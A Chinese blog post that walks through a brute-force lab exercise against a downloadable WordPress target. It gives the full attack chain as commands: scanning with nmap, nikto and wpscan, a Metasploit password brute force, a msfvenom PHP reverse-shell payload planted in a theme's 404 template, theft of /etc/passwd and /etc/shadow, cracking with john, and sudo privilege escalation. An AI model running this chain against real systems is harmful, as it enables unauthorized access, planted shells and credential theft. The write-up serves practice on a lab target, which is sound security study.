暴力破解漏洞

最新推荐文章于 2024-07-16 10:57:18 发布
最新推荐文章于 2024-07-16 10:57:18 发布
阅读量1k 收藏 3
点赞数
分类专栏: Web漏洞利用 文章标签: 信息安全 web 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/112610487
版权

暴力破解漏洞实现原理

暴力破解的产生是由于服务器没有做限制,导致攻击者可以通过暴力的手段破解所需信息,如用户名、密码、验证码等。暴力破解需要一个庞大的字典,如4位数字的验证码,那么暴力破解的范围就是0000~9999,暴力破解的关键在于字典的大小。

靶机搭建

链接:https://pan.baidu.com/s/1Zw_huwIenjGTXUteftOuUw
提取码:vuq6

漏洞复现

  1. 使用netdiscover发现存活主机
netdiscover -i eth0

在这里插入图片描述

  1. 使用nmap,nikto进行信息探测
nmap -sV 192.168.101.48
nikto -host http://192.168.101.48

在这里插入图片描述
在这里插入图片描述

  1. 发现了secret这个敏感目录,登录该目录下尝试进入login后台失败
    在这里插入图片描述
  • 修改/etc/hosts文件,添加多一条域名解析记录就可成功访问
    在这里插入图片描述
  1. 首先我们必须知道该网站都存在哪些用户名,我们这里使用wpscan来对该网站的用户名进行暴力破解
wpscan --url http://vtcsec/secret --enumerate u
  • 破解到一个admin的账号
    在这里插入图片描述
  1. 接下来我们的重头戏来了!使用msfconsole对其密码进行暴力穷举
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 靶机IP
set username admin
set pass_file /usr/share/wordlists/dirb/common.txt
set targeturi /secret/
run
  • 破解出用户名和密码均为admin
    在这里插入图片描述
  1. 在利用handler模块进行监听反弹shell,也是在msf中进行
back
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 本机IP
run
  1. 登录后台后,找到editors目录下的404Template,使用生成的静荷替换404模板里的内容
msfvenom -p php/meterpreter/reverse_tcp lhost=本机IP lport=4444 -f raw

在这里插入图片描述

  1. 在URL中输入以下网址,即可反弹shell
http://靶机IP/secret/wp-content/themes/twentyseventeen/404.php
  • 注:这里的twentyseventeen指的是这里的小写值
    在这里插入图片描述
  1. shell反弹成功,但是发现只是一个普通的www-data账户,我们输入以下命令进入命令行界面
  • 下载靶机的passwd和shadow散列值到kali本机的根目录下
download /etc/passwd
download /etc/shadow
  • 在kali本机中进行john的暴力破解,破解到了一个用户名密码均为marlinspike
unshadow passwd shadow > cracked
john cracked
  • 注:这里解释一下unshadow这个命令,这个命令是将密码文件和密码的散列值进行组装的一个命令,专门配合john命令来使用的
  1. 在msf中进行提权
shell
python -c "import pty;pty.spawn('/bin/bash')"
su - marlinspike
  • 进入marlinspike账户后,查看该用户sudo能执行的权限,发现是root的所有执行权限,赚大发了!果断使用sudo bash命令提权
    在这里插入图片描述
    在这里插入图片描述

总结:其实暴力破解在实战中也是很常用的一种方式,在渗透测试者收集到的有用信息极少极少时,便可以尝试暴力破解的方式,但成功率完全取决于字典大小

平凡的学者
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
若依框架的暴力破解漏洞
千寻的博客
11-23 2152
由于图片验证码未做好`前后台的统一校验`,可重复利用验证码,以及无登录错误次数限制等,导致攻击者可对账号与密码进行的穷举测试,从而获取网站登录访问权限
Web安全从入门到放弃】01_暴力破解漏洞
xhxtalent的博客
12-05 529
01_暴力破解漏洞 暴力破解攻击&暴力破解漏洞概述 问:什么是暴力破解? 答:连续性尝试 + 字典 +自动化 一个有效的字典,可以大大的提高暴力破解的效率: 常用的账号密码(弱口令) ,比如常用用户名/密码TOP 500等。 互联网上被脱裤后账号密码(社工库), 比如CSDN当年泄漏的约600w用户信息。 使用指定的字符使用工具按照指定的规则进行排列组合算法生成的密码。 判断是否存在暴力破解漏洞: 是否要求用户设置了复杂的密码; 是否每次认证都使用安全的验证码; 是否对尝试登录的行为进行判断和
docker安装bwapp漏洞实验环境 并复现逻辑漏洞暴力破解实验
记录笔记
04-18 2581
docker search bwapp docker pull raesene/bwapp docker images docker run -it -d -p 8080:80 332 docker ps http://192.168.15.136:8080/install.php 复现 跑出来账号是 bee 密码是 bug 暴力破解的原理就是使用攻击者自己的用户名和密码的字典,一个一个去尝试,尝试是否能够登录,未爆破成功原因就是自有的字典里面的没有这个所需要暴力 用户名和密码的这个
什么是暴力破解漏洞
ailx10
12-20 254
大黑客:小v呀,你家的手机怎么输入3次错误密码还没有锁住啊?ailx10:我手机高级,能输入5次,哈哈哈哈上面的这种场景就属于暴力破解,大黑客不知道小v的手机密码,于是猜测可能的密码,那么在网络安全领域,这就属于暴力破解的范畴了,现代密码学保证了算法的可靠性,但是如果像下面这个场景中,我们的小v同学的密码过于简单,那么爆破穷举可能的密码,直接可以拿到密码哟,...,几天后,大黑客被请去喝茶了。在线...
Web常见漏洞之po解
最新发布
m0_64365018的博客
07-16 857
暴力破解Web漏洞里常见的一种渗透方式,攻击者会试图通过尝试各种可能的用户名和密码组合来猜测密码或密钥,直到猜对为止123。攻击者会经常使用自动化脚本组合出正确的用户名和密码。暴力破解的过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。有时候可能会带来意想不到的效果,今天我将用一个简单的实验来说明什么是暴力破解并介绍其应用场景和一些可能的验证码绕过。
暴力破解漏洞复现
weixin_48900801的博客
03-13 564
暴力破解漏洞复现
网络安全之暴力破解
Z4400840的博客
05-13 1758
暴力破解也称为字典攻击,通常被用于攻击网站的用户账户名/密码。使用自动化脚本以枚举的方式尝试所有可能的用户名或密码组合。通过攻击用户的账户名和密码,窃取用户个人信息或获取网站管理权限等。暴力破解也被称为枚举测试、穷举法测试,就是将每个可能的结果逐个比较,直到找出正确的结果为止。①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析。
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞暴力破解漏洞检测工具源码 2.shiro反序列化漏洞暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞暴力破解漏洞检测工具使用方法 5.shiro...
DVWA靶场之暴力破解漏洞
weixin_46062722的博客
01-03 905
暴力破解简介 暴力破解也叫穷举法,其基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。 暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。 危害: 恶意用户登录 服务器沦陷 敏感信息泄露 用户密码
pikachu靶场,复现暴力破解漏洞
WSGWZlz的博客
11-20 294
pikachu靶场的搭建及暴力破解通关
Web安全基础学习:暴力破解漏洞之用户名枚举
qq_51862722的博客
06-18 749
用户名枚举漏洞学习:在应用系统登录的过程中,当输入错误的用户名信息时,应用程序将反馈相应的诸如“用户不存在”的错误提示,攻击者可通过该提示为依据对用户名进行枚举,猜解出已存在于应用系统的用户名信息,最终攻击者再对已有用户的密码进一步猜解,从而降低暴力破解的成本。
暴力破解漏洞解析
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-05 3056
文章目录一、漏洞概述1、什么是暴力破解漏洞?2、漏洞存在的原因3、如何测试漏洞的存在?二、一次简单的暴力破解测试 一、漏洞概述 从来没有哪个时代的黑客像今天一样热衷于猜解密码----奥斯特洛夫斯基 1、什么是暴力破解漏洞暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息,经常是使用自动化脚本组合出正确的用户名和密码。 简单理解: 连续性尝试 + 字典 + 自动化 字典的使用: 常用密码 脱裤密码 使用特定规则自动生成 2、
1.暴力破解漏洞简介——DVWA
qwsn
11-24 1586
0x01:暴力破解漏洞简介 1.英文名:Brute Force 2.实质:用穷举法破解某一命题的唯一答案 3.存在于:Web应用需要输入弱口令的登录框 4.注意:不能有流量清洗设备(因为流量清洗设备会检测到你很短时间内的枚举法尝试登录,从而清洗过滤掉) ...
BurpSuit暴力破解密码
weixin_42299610的博客
03-15 2347
暴力破解原理 暴力破解是用户自定义字典文件中的内容与验证程序交互,从而在枚举过程中得到正确数据 案例: 破解用户名、密码 破解验证码-之前四位数的手机验证码在未进行任何防护措施,导致被枚举出来 暴力破解的基础 应用程序或服务器未进行限制 具有内容涵盖全方面的字典文件 暴力破解方式 根据破解的验证码内容是否处于服务状态将暴力破解分为以下两类: 1.在线破解 2.离线破解 无论是在线还是离线是否可以...
为什么你的服务器总被入侵?SSH密码暴力破解实战
Linux云计算数据自学
02-24 3525
对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Workin...
web安全之暴力破解(一)
Delity的博客
06-11 1400
一.暴力破解简介 暴力破解的产生原因是因为服务器端没有做限制,导致攻击者可以通过暴力破解的手段破解用户所需要的信息,如用户名、密码、验证码等。暴力破解需要有庞大的字典,暴力破解的关键在于字典的大小。 二.暴力破解的原理 暴力破解的原理就是使用字典中的内容进行一一尝试,如果匹配成功了,提示该用户名密码正确,如果匹配失败,那么会继续进行尝试。 三、暴力破解之BurpSuite介绍 BurpSuite爆破中共有四种类型,Sniper、Battering ram、pitchfork、Cluster bomb。爆破完
pikachu靶场怎么对暴力破解漏洞进行防御
06-09
针对暴力破解漏洞,Pikachu靶场可以采取以下防御措施: 1. 加强密码策略:设置复杂度要求高的密码,包括数字、大小写字母和特殊符号,同时要求用户定期更换密码。 2. 增加登录限制:采用限制登录尝试次数和登录失败锁定账号等措施,可以有效防止暴力破解。 3. 增加验证码:在登录页面增加验证码,可以防止自动化程序暴力攻击。 4. 使用双因素认证:使用双因素认证可以提高账户的安全性,防止暴力破解攻击。 5. 强化监控和日志审计:对于登录失败的记录进行监控和日志审计,及时发现异常行为并采取相应的措施。 以上是一些常见的防御措施,但需要根据具体情况进行调整和完善。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值